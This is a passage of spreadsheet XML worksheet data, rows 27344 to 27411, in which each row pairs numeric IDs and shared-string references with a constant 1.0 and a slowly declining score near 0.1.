      <c r="E27344" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27344" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27345" ht="15.75" customHeight="1">
      <c r="A27345" s="1">
        <v>31251.0</v>
      </c>
      <c r="B27345" s="2">
        <v>4941134.0</v>
      </c>
      <c r="C27345" s="2" t="s">
        <v>26281</v>
      </c>
      <c r="D27345" s="2">
        <v>1.0</v>
      </c>
      <c r="E27345" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27345" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27346" ht="15.75" customHeight="1">
      <c r="A27346" s="1">
        <v>31429.0</v>
      </c>
      <c r="B27346" s="2">
        <v>5.0134747E7</v>
      </c>
      <c r="C27346" s="2" t="s">
        <v>26282</v>
      </c>
      <c r="D27346" s="2">
        <v>1.0</v>
      </c>
      <c r="E27346" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27346" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27347" ht="15.75" customHeight="1">
      <c r="A27347" s="1">
        <v>31559.0</v>
      </c>
      <c r="B27347" s="2">
        <v>5121429.0</v>
      </c>
      <c r="C27347" s="2" t="s">
        <v>26283</v>
      </c>
      <c r="D27347" s="2">
        <v>1.0</v>
      </c>
      <c r="E27347" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27347" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27348" ht="15.75" customHeight="1">
      <c r="A27348" s="1">
        <v>31838.0</v>
      </c>
      <c r="B27348" s="2">
        <v>5266028.0</v>
      </c>
      <c r="C27348" s="2" t="s">
        <v>26284</v>
      </c>
      <c r="D27348" s="2">
        <v>1.0</v>
      </c>
      <c r="E27348" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27348" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27349" ht="15.75" customHeight="1">
      <c r="A27349" s="1">
        <v>31892.0</v>
      </c>
      <c r="B27349" s="2">
        <v>5289321.0</v>
      </c>
      <c r="C27349" s="2" t="s">
        <v>26285</v>
      </c>
      <c r="D27349" s="2">
        <v>1.0</v>
      </c>
      <c r="E27349" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27349" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27350" ht="15.75" customHeight="1">
      <c r="A27350" s="1">
        <v>32146.0</v>
      </c>
      <c r="B27350" s="2">
        <v>5423428.0</v>
      </c>
      <c r="C27350" s="2" t="s">
        <v>26286</v>
      </c>
      <c r="D27350" s="2">
        <v>1.0</v>
      </c>
      <c r="E27350" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27350" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27351" ht="15.75" customHeight="1">
      <c r="A27351" s="1">
        <v>32388.0</v>
      </c>
      <c r="B27351" s="2">
        <v>5621734.0</v>
      </c>
      <c r="C27351" s="2" t="s">
        <v>26287</v>
      </c>
      <c r="D27351" s="2">
        <v>1.0</v>
      </c>
      <c r="E27351" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27351" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27352" ht="15.75" customHeight="1">
      <c r="A27352" s="1">
        <v>32518.0</v>
      </c>
      <c r="B27352" s="2">
        <v>5.7200553E7</v>
      </c>
      <c r="C27352" s="2" t="s">
        <v>26288</v>
      </c>
      <c r="D27352" s="2">
        <v>1.0</v>
      </c>
      <c r="E27352" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27352" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27353" ht="15.75" customHeight="1">
      <c r="A27353" s="1">
        <v>33181.0</v>
      </c>
      <c r="B27353" s="2">
        <v>7107607.0</v>
      </c>
      <c r="C27353" s="2" t="s">
        <v>26289</v>
      </c>
      <c r="D27353" s="2">
        <v>1.0</v>
      </c>
      <c r="E27353" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27353" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27354" ht="15.75" customHeight="1">
      <c r="A27354" s="1">
        <v>33415.0</v>
      </c>
      <c r="B27354" s="2">
        <v>7737575.0</v>
      </c>
      <c r="C27354" s="2" t="s">
        <v>26290</v>
      </c>
      <c r="D27354" s="2">
        <v>1.0</v>
      </c>
      <c r="E27354" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27354" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27355" ht="15.75" customHeight="1">
      <c r="A27355" s="1">
        <v>33589.0</v>
      </c>
      <c r="B27355" s="2">
        <v>8325752.0</v>
      </c>
      <c r="C27355" s="2" t="s">
        <v>26291</v>
      </c>
      <c r="D27355" s="2">
        <v>1.0</v>
      </c>
      <c r="E27355" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27355" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27356" ht="15.75" customHeight="1">
      <c r="A27356" s="1">
        <v>33620.0</v>
      </c>
      <c r="B27356" s="2">
        <v>8348934.0</v>
      </c>
      <c r="C27356" s="2" t="s">
        <v>26292</v>
      </c>
      <c r="D27356" s="2">
        <v>1.0</v>
      </c>
      <c r="E27356" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27356" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27357" ht="15.75" customHeight="1">
      <c r="A27357" s="1">
        <v>33959.0</v>
      </c>
      <c r="B27357" s="2">
        <v>9323561.0</v>
      </c>
      <c r="C27357" s="2" t="s">
        <v>26264</v>
      </c>
      <c r="D27357" s="2">
        <v>1.0</v>
      </c>
      <c r="E27357" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27357" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27358" ht="15.75" customHeight="1">
      <c r="A27358" s="1">
        <v>34016.0</v>
      </c>
      <c r="B27358" s="2">
        <v>9512074.0</v>
      </c>
      <c r="C27358" s="2" t="s">
        <v>26293</v>
      </c>
      <c r="D27358" s="2">
        <v>1.0</v>
      </c>
      <c r="E27358" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27358" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27359" ht="15.75" customHeight="1">
      <c r="A27359" s="1">
        <v>34227.0</v>
      </c>
      <c r="B27359" s="2">
        <v>4.5154399E7</v>
      </c>
      <c r="C27359" s="2" t="s">
        <v>26294</v>
      </c>
      <c r="D27359" s="2">
        <v>1.0</v>
      </c>
      <c r="E27359" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27359" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27360" ht="15.75" customHeight="1">
      <c r="A27360" s="1">
        <v>29422.0</v>
      </c>
      <c r="B27360" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C27360" s="2" t="s">
        <v>26295</v>
      </c>
      <c r="D27360" s="2">
        <v>1.0</v>
      </c>
      <c r="E27360" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27360" s="2">
        <v>0.1012544802867383</v>
      </c>
    </row>
    <row r="27361" ht="15.75" customHeight="1">
      <c r="A27361" s="1">
        <v>10082.0</v>
      </c>
      <c r="B27361" s="2">
        <v>5.7157164E7</v>
      </c>
      <c r="C27361" s="2" t="s">
        <v>26296</v>
      </c>
      <c r="D27361" s="2">
        <v>1.0</v>
      </c>
      <c r="E27361" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27361" s="2">
        <v>0.1005747126436781</v>
      </c>
    </row>
    <row r="27362" ht="15.75" customHeight="1">
      <c r="A27362" s="1">
        <v>5866.0</v>
      </c>
      <c r="B27362" s="2">
        <v>4.7002854E7</v>
      </c>
      <c r="C27362" s="2" t="s">
        <v>26297</v>
      </c>
      <c r="D27362" s="2">
        <v>1.0</v>
      </c>
      <c r="E27362" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27362" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="27363" ht="15.75" customHeight="1">
      <c r="A27363" s="1">
        <v>11765.0</v>
      </c>
      <c r="B27363" s="2">
        <v>2.4193947E7</v>
      </c>
      <c r="C27363" s="2" t="s">
        <v>26298</v>
      </c>
      <c r="D27363" s="2">
        <v>1.0</v>
      </c>
      <c r="E27363" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27363" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="27364" ht="15.75" customHeight="1">
      <c r="A27364" s="1">
        <v>20086.0</v>
      </c>
      <c r="B27364" s="2">
        <v>9332129.0</v>
      </c>
      <c r="C27364" s="2" t="s">
        <v>26299</v>
      </c>
      <c r="D27364" s="2">
        <v>1.0</v>
      </c>
      <c r="E27364" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27364" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="27365" ht="15.75" customHeight="1">
      <c r="A27365" s="1">
        <v>28683.0</v>
      </c>
      <c r="B27365" s="2">
        <v>2.7574067E7</v>
      </c>
      <c r="C27365" s="2" t="s">
        <v>26300</v>
      </c>
      <c r="D27365" s="2">
        <v>1.0</v>
      </c>
      <c r="E27365" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27365" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="27366" ht="15.75" customHeight="1">
      <c r="A27366" s="1">
        <v>19397.0</v>
      </c>
      <c r="B27366" s="2">
        <v>5.5575548E7</v>
      </c>
      <c r="C27366" s="2" t="s">
        <v>26301</v>
      </c>
      <c r="D27366" s="2">
        <v>1.0</v>
      </c>
      <c r="E27366" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27366" s="2">
        <v>0.1003316749585406</v>
      </c>
    </row>
    <row r="27367" ht="15.75" customHeight="1">
      <c r="A27367" s="1">
        <v>18983.0</v>
      </c>
      <c r="B27367" s="2">
        <v>5.4388379E7</v>
      </c>
      <c r="C27367" s="2" t="s">
        <v>26302</v>
      </c>
      <c r="D27367" s="2">
        <v>1.0</v>
      </c>
      <c r="E27367" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27367" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="27368" ht="15.75" customHeight="1">
      <c r="A27368" s="1">
        <v>23588.0</v>
      </c>
      <c r="B27368" s="2">
        <v>6311584.0</v>
      </c>
      <c r="C27368" s="2" t="s">
        <v>26303</v>
      </c>
      <c r="D27368" s="2">
        <v>1.0</v>
      </c>
      <c r="E27368" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27368" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="27369" ht="15.75" customHeight="1">
      <c r="A27369" s="1">
        <v>23637.0</v>
      </c>
      <c r="B27369" s="2">
        <v>6655729.0</v>
      </c>
      <c r="C27369" s="2" t="s">
        <v>26304</v>
      </c>
      <c r="D27369" s="2">
        <v>1.0</v>
      </c>
      <c r="E27369" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27369" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="27370" ht="15.75" customHeight="1">
      <c r="A27370" s="1">
        <v>24842.0</v>
      </c>
      <c r="B27370" s="2">
        <v>1.2182013E7</v>
      </c>
      <c r="C27370" s="2" t="s">
        <v>26305</v>
      </c>
      <c r="D27370" s="2">
        <v>1.0</v>
      </c>
      <c r="E27370" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27370" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="27371" ht="15.75" customHeight="1">
      <c r="A27371" s="1">
        <v>9455.0</v>
      </c>
      <c r="B27371" s="2">
        <v>5.5844044E7</v>
      </c>
      <c r="C27371" s="2" t="s">
        <v>26306</v>
      </c>
      <c r="D27371" s="2">
        <v>1.0</v>
      </c>
      <c r="E27371" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27371" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="27372" ht="15.75" customHeight="1">
      <c r="A27372" s="1">
        <v>10515.0</v>
      </c>
      <c r="B27372" s="2">
        <v>1.1814396E7</v>
      </c>
      <c r="C27372" s="2" t="s">
        <v>26307</v>
      </c>
      <c r="D27372" s="2">
        <v>1.0</v>
      </c>
      <c r="E27372" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27372" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="27373" ht="15.75" customHeight="1">
      <c r="A27373" s="1">
        <v>10778.0</v>
      </c>
      <c r="B27373" s="2">
        <v>1.5654396E7</v>
      </c>
      <c r="C27373" s="2" t="s">
        <v>26308</v>
      </c>
      <c r="D27373" s="2">
        <v>1.0</v>
      </c>
      <c r="E27373" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27373" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="27374" ht="15.75" customHeight="1">
      <c r="A27374" s="1">
        <v>13408.0</v>
      </c>
      <c r="B27374" s="2">
        <v>3.500249E7</v>
      </c>
      <c r="C27374" s="2" t="s">
        <v>26309</v>
      </c>
      <c r="D27374" s="2">
        <v>1.0</v>
      </c>
      <c r="E27374" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27374" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="27375" ht="15.75" customHeight="1">
      <c r="A27375" s="1">
        <v>20549.0</v>
      </c>
      <c r="B27375" s="2">
        <v>1.3381642E7</v>
      </c>
      <c r="C27375" s="2" t="s">
        <v>26310</v>
      </c>
      <c r="D27375" s="2">
        <v>1.0</v>
      </c>
      <c r="E27375" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27375" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="27376" ht="15.75" customHeight="1">
      <c r="A27376" s="1">
        <v>31126.0</v>
      </c>
      <c r="B27376" s="2">
        <v>4.8871772E7</v>
      </c>
      <c r="C27376" s="2" t="s">
        <v>26311</v>
      </c>
      <c r="D27376" s="2">
        <v>1.0</v>
      </c>
      <c r="E27376" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27376" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="27377" ht="15.75" customHeight="1">
      <c r="A27377" s="1">
        <v>8723.0</v>
      </c>
      <c r="B27377" s="2">
        <v>5.4505843E7</v>
      </c>
      <c r="C27377" s="2" t="s">
        <v>26312</v>
      </c>
      <c r="D27377" s="2">
        <v>1.0</v>
      </c>
      <c r="E27377" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27377" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="27378" ht="15.75" customHeight="1">
      <c r="A27378" s="1">
        <v>8801.0</v>
      </c>
      <c r="B27378" s="2">
        <v>5.4611684E7</v>
      </c>
      <c r="C27378" s="2" t="s">
        <v>26313</v>
      </c>
      <c r="D27378" s="2">
        <v>1.0</v>
      </c>
      <c r="E27378" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27378" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="27379" ht="15.75" customHeight="1">
      <c r="A27379" s="1">
        <v>12279.0</v>
      </c>
      <c r="B27379" s="2">
        <v>2.8159351E7</v>
      </c>
      <c r="C27379" s="2" t="s">
        <v>26314</v>
      </c>
      <c r="D27379" s="2">
        <v>1.0</v>
      </c>
      <c r="E27379" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27379" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="27380" ht="15.75" customHeight="1">
      <c r="A27380" s="1">
        <v>25057.0</v>
      </c>
      <c r="B27380" s="2">
        <v>1.2868179E7</v>
      </c>
      <c r="C27380" s="2" t="s">
        <v>26315</v>
      </c>
      <c r="D27380" s="2">
        <v>1.0</v>
      </c>
      <c r="E27380" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27380" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="27381" ht="15.75" customHeight="1">
      <c r="A27381" s="1">
        <v>8703.0</v>
      </c>
      <c r="B27381" s="2">
        <v>5.4442241E7</v>
      </c>
      <c r="C27381" s="2" t="s">
        <v>26316</v>
      </c>
      <c r="D27381" s="2">
        <v>1.0</v>
      </c>
      <c r="E27381" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27381" s="2">
        <v>0.09964726631393298</v>
      </c>
    </row>
    <row r="27382" ht="15.75" customHeight="1">
      <c r="A27382" s="1">
        <v>13014.0</v>
      </c>
      <c r="B27382" s="2">
        <v>3.2901837E7</v>
      </c>
      <c r="C27382" s="2" t="s">
        <v>26317</v>
      </c>
      <c r="D27382" s="2">
        <v>1.0</v>
      </c>
      <c r="E27382" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27382" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="27383" ht="15.75" customHeight="1">
      <c r="A27383" s="1">
        <v>14834.0</v>
      </c>
      <c r="B27383" s="2">
        <v>4.1022529E7</v>
      </c>
      <c r="C27383" s="2" t="s">
        <v>26318</v>
      </c>
      <c r="D27383" s="2">
        <v>1.0</v>
      </c>
      <c r="E27383" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27383" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="27384" ht="15.75" customHeight="1">
      <c r="A27384" s="1">
        <v>18633.0</v>
      </c>
      <c r="B27384" s="2">
        <v>5.3383622E7</v>
      </c>
      <c r="C27384" s="2" t="s">
        <v>26319</v>
      </c>
      <c r="D27384" s="2">
        <v>1.0</v>
      </c>
      <c r="E27384" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27384" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="27385" ht="15.75" customHeight="1">
      <c r="A27385" s="1">
        <v>19516.0</v>
      </c>
      <c r="B27385" s="2">
        <v>5.5949611E7</v>
      </c>
      <c r="C27385" s="2" t="s">
        <v>26320</v>
      </c>
      <c r="D27385" s="2">
        <v>1.0</v>
      </c>
      <c r="E27385" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27385" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="27386" ht="15.75" customHeight="1">
      <c r="A27386" s="1">
        <v>22414.0</v>
      </c>
      <c r="B27386" s="2">
        <v>3.6012622E7</v>
      </c>
      <c r="C27386" s="2" t="s">
        <v>26321</v>
      </c>
      <c r="D27386" s="2">
        <v>1.0</v>
      </c>
      <c r="E27386" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27386" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="27387" ht="15.75" customHeight="1">
      <c r="A27387" s="1">
        <v>22625.0</v>
      </c>
      <c r="B27387" s="2">
        <v>4.0317196E7</v>
      </c>
      <c r="C27387" s="2" t="s">
        <v>26322</v>
      </c>
      <c r="D27387" s="2">
        <v>1.0</v>
      </c>
      <c r="E27387" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27387" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="27388" ht="15.75" customHeight="1">
      <c r="A27388" s="1">
        <v>122.0</v>
      </c>
      <c r="B27388" s="2">
        <v>1.3113113E7</v>
      </c>
      <c r="C27388" s="2" t="s">
        <v>26323</v>
      </c>
      <c r="D27388" s="2">
        <v>1.0</v>
      </c>
      <c r="E27388" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27388" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27389" ht="15.75" customHeight="1">
      <c r="A27389" s="1">
        <v>229.0</v>
      </c>
      <c r="B27389" s="2">
        <v>1.4758457E7</v>
      </c>
      <c r="C27389" s="2" t="s">
        <v>26324</v>
      </c>
      <c r="D27389" s="2">
        <v>1.0</v>
      </c>
      <c r="E27389" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27389" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27390" ht="15.75" customHeight="1">
      <c r="A27390" s="1">
        <v>247.0</v>
      </c>
      <c r="B27390" s="2">
        <v>1.5033223E7</v>
      </c>
      <c r="C27390" s="2" t="s">
        <v>26325</v>
      </c>
      <c r="D27390" s="2">
        <v>1.0</v>
      </c>
      <c r="E27390" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27390" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27391" ht="15.75" customHeight="1">
      <c r="A27391" s="1">
        <v>908.0</v>
      </c>
      <c r="B27391" s="2">
        <v>2.2140752E7</v>
      </c>
      <c r="C27391" s="2" t="s">
        <v>26326</v>
      </c>
      <c r="D27391" s="2">
        <v>1.0</v>
      </c>
      <c r="E27391" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27391" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27392" ht="15.75" customHeight="1">
      <c r="A27392" s="1">
        <v>1026.0</v>
      </c>
      <c r="B27392" s="2">
        <v>2.3175354E7</v>
      </c>
      <c r="C27392" s="2" t="s">
        <v>26327</v>
      </c>
      <c r="D27392" s="2">
        <v>1.0</v>
      </c>
      <c r="E27392" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27392" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27393" ht="15.75" customHeight="1">
      <c r="A27393" s="1">
        <v>1099.0</v>
      </c>
      <c r="B27393" s="2">
        <v>2.3914141E7</v>
      </c>
      <c r="C27393" s="2" t="s">
        <v>26328</v>
      </c>
      <c r="D27393" s="2">
        <v>1.0</v>
      </c>
      <c r="E27393" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27393" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27394" ht="15.75" customHeight="1">
      <c r="A27394" s="1">
        <v>2152.0</v>
      </c>
      <c r="B27394" s="2">
        <v>3.1639732E7</v>
      </c>
      <c r="C27394" s="2" t="s">
        <v>26329</v>
      </c>
      <c r="D27394" s="2">
        <v>1.0</v>
      </c>
      <c r="E27394" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27394" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27395" ht="15.75" customHeight="1">
      <c r="A27395" s="1">
        <v>2279.0</v>
      </c>
      <c r="B27395" s="2">
        <v>3.2541759E7</v>
      </c>
      <c r="C27395" s="2" t="s">
        <v>26330</v>
      </c>
      <c r="D27395" s="2">
        <v>1.0</v>
      </c>
      <c r="E27395" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27395" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27396" ht="15.75" customHeight="1">
      <c r="A27396" s="1">
        <v>3585.0</v>
      </c>
      <c r="B27396" s="2">
        <v>3.9024085E7</v>
      </c>
      <c r="C27396" s="2" t="s">
        <v>26331</v>
      </c>
      <c r="D27396" s="2">
        <v>1.0</v>
      </c>
      <c r="E27396" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27396" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27397" ht="15.75" customHeight="1">
      <c r="A27397" s="1">
        <v>3772.0</v>
      </c>
      <c r="B27397" s="2">
        <v>3.9861478E7</v>
      </c>
      <c r="C27397" s="2" t="s">
        <v>26332</v>
      </c>
      <c r="D27397" s="2">
        <v>1.0</v>
      </c>
      <c r="E27397" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27397" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27398" ht="15.75" customHeight="1">
      <c r="A27398" s="1">
        <v>3901.0</v>
      </c>
      <c r="B27398" s="2">
        <v>4.0474451E7</v>
      </c>
      <c r="C27398" s="2" t="s">
        <v>26333</v>
      </c>
      <c r="D27398" s="2">
        <v>1.0</v>
      </c>
      <c r="E27398" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27398" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27399" ht="15.75" customHeight="1">
      <c r="A27399" s="1">
        <v>3915.0</v>
      </c>
      <c r="B27399" s="2">
        <v>4.0545421E7</v>
      </c>
      <c r="C27399" s="2" t="s">
        <v>26334</v>
      </c>
      <c r="D27399" s="2">
        <v>1.0</v>
      </c>
      <c r="E27399" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27399" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27400" ht="15.75" customHeight="1">
      <c r="A27400" s="1">
        <v>4960.0</v>
      </c>
      <c r="B27400" s="2">
        <v>4.4076742E7</v>
      </c>
      <c r="C27400" s="2" t="s">
        <v>26335</v>
      </c>
      <c r="D27400" s="2">
        <v>1.0</v>
      </c>
      <c r="E27400" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27400" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27401" ht="15.75" customHeight="1">
      <c r="A27401" s="1">
        <v>5122.0</v>
      </c>
      <c r="B27401" s="2">
        <v>4.4577224E7</v>
      </c>
      <c r="C27401" s="2" t="s">
        <v>26336</v>
      </c>
      <c r="D27401" s="2">
        <v>1.0</v>
      </c>
      <c r="E27401" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27401" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27402" ht="15.75" customHeight="1">
      <c r="A27402" s="1">
        <v>5464.0</v>
      </c>
      <c r="B27402" s="2">
        <v>4.5665643E7</v>
      </c>
      <c r="C27402" s="2" t="s">
        <v>26337</v>
      </c>
      <c r="D27402" s="2">
        <v>1.0</v>
      </c>
      <c r="E27402" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27402" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27403" ht="15.75" customHeight="1">
      <c r="A27403" s="1">
        <v>6288.0</v>
      </c>
      <c r="B27403" s="2">
        <v>4.8185164E7</v>
      </c>
      <c r="C27403" s="2" t="s">
        <v>26338</v>
      </c>
      <c r="D27403" s="2">
        <v>1.0</v>
      </c>
      <c r="E27403" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27403" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27404" ht="15.75" customHeight="1">
      <c r="A27404" s="1">
        <v>6669.0</v>
      </c>
      <c r="B27404" s="2">
        <v>4.9124034E7</v>
      </c>
      <c r="C27404" s="2" t="s">
        <v>26339</v>
      </c>
      <c r="D27404" s="2">
        <v>1.0</v>
      </c>
      <c r="E27404" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27404" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27405" ht="15.75" customHeight="1">
      <c r="A27405" s="1">
        <v>6706.0</v>
      </c>
      <c r="B27405" s="2">
        <v>4.9230981E7</v>
      </c>
      <c r="C27405" s="2" t="s">
        <v>26340</v>
      </c>
      <c r="D27405" s="2">
        <v>1.0</v>
      </c>
      <c r="E27405" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27405" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27406" ht="15.75" customHeight="1">
      <c r="A27406" s="1">
        <v>6839.0</v>
      </c>
      <c r="B27406" s="2">
        <v>4.9612626E7</v>
      </c>
      <c r="C27406" s="2" t="s">
        <v>26341</v>
      </c>
      <c r="D27406" s="2">
        <v>1.0</v>
      </c>
      <c r="E27406" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27406" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27407" ht="15.75" customHeight="1">
      <c r="A27407" s="1">
        <v>7011.0</v>
      </c>
      <c r="B27407" s="2">
        <v>5.0093126E7</v>
      </c>
      <c r="C27407" s="2" t="s">
        <v>26342</v>
      </c>
      <c r="D27407" s="2">
        <v>1.0</v>
      </c>
      <c r="E27407" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27407" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27408" ht="15.75" customHeight="1">
      <c r="A27408" s="1">
        <v>7018.0</v>
      </c>
      <c r="B27408" s="2">
        <v>5.0095074E7</v>
      </c>
      <c r="C27408" s="2" t="s">
        <v>26343</v>
      </c>
      <c r="D27408" s="2">
        <v>1.0</v>
      </c>
      <c r="E27408" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27408" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27409" ht="15.75" customHeight="1">
      <c r="A27409" s="1">
        <v>8097.0</v>
      </c>
      <c r="B27409" s="2">
        <v>5.3060119E7</v>
      </c>
      <c r="C27409" s="2" t="s">
        <v>26344</v>
      </c>
      <c r="D27409" s="2">
        <v>1.0</v>
      </c>
      <c r="E27409" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27409" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27410" ht="15.75" customHeight="1">
      <c r="A27410" s="1">
        <v>8493.0</v>
      </c>
      <c r="B27410" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C27410" s="2" t="s">
        <v>26345</v>
      </c>
      <c r="D27410" s="2">
        <v>1.0</v>
      </c>
      <c r="E27410" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27410" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27411" ht="15.75" customHeight="1">
      <c r="A27411" s="1">
        <v>8758.0</v>
      </c>
      <c r="B27411" s="2">
        <v>5.4568431E7</v>
      </c>
      <c r="C27411" s="2" t="s">
        <v>26346</v>
      </c>
      <c r="D27411" s="2">
        <v>1.0</v>
      </c>
      <c r="E27411" s="3" t="s">
        <v>24318</v>
